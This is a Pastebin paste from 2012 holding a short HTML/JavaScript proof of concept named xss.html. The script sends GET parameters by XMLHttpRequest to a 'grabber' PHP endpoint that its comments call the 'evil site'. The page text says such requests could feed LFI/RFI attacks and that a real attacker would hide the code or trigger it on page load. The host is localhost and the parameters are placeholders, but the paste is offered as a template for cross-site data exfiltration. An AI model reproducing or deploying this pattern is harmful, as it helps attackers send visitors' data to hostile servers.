SHARE
TWEET

js GET xhr sample

a guest Aug 5th, 2012 478 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. blog$ cat xss.html
  2. <!DOCTYPE html>
  3. <html>
  4. <head>
  5. <script type="text/javascript">
  6. function oneSecAttack() {
  7. var xmlhttp;
  8. var base = 'http://localhost/kuba/sample/REgrabber.php?'; // base url - url to evilsite
  9. var a = 'a=aa';        // parameters
  10. var b ='&b=bb';        //   ...
  11. var c ='&c=cc';        //     ...
  12.  
  13. if (window.XMLHttpRequest)   {// for IE7+/FF/Chrome
  14.   xmlhttp=new XMLHttpRequest();
  15.   }
  16. else   {// for ie5/6
  17.   xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
  18.   }
  19. xmlhttp.onreadystatechange=function() // run forest run
  20.   {
  21.   if (xmlhttp.readyState==4 && xmlhttp.status==200)
  22.     {
  23.     document.getElementById("myDiv").innerHTML=xmlhttp.responseText;
  24.     }
  25.   }
  26.  
  27. var url2 = base + a + b + c;
  28. xmlhttp.open("GET",url2 ,true);
  29. xmlhttp.send();
  30. document.write(url2 + " - <br><br>this HTTP GET content goes to evil site as a parameters<br>");
  31. document.write("it could be usefull in future (lfi/rfi for example)<br>");
  32. // fin
  33. }
  34. </script>
  35. </head>
  36. <body>
  37.  
  38. <h2>Try to hide me</h2>
  39. <button type="button" onclick="oneSecAttack()">Hide now!</button>
  40. <b><br><br><br>Here we are loading request from onClick(). I think in 'real-life'<br>
  41. scenario, attacker will hide his code and/or add it as a 'onLoad' or similar idea.</b>
  42. <div id="myDiv"></div>
  43.  
  44. </body>
  45. </html>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top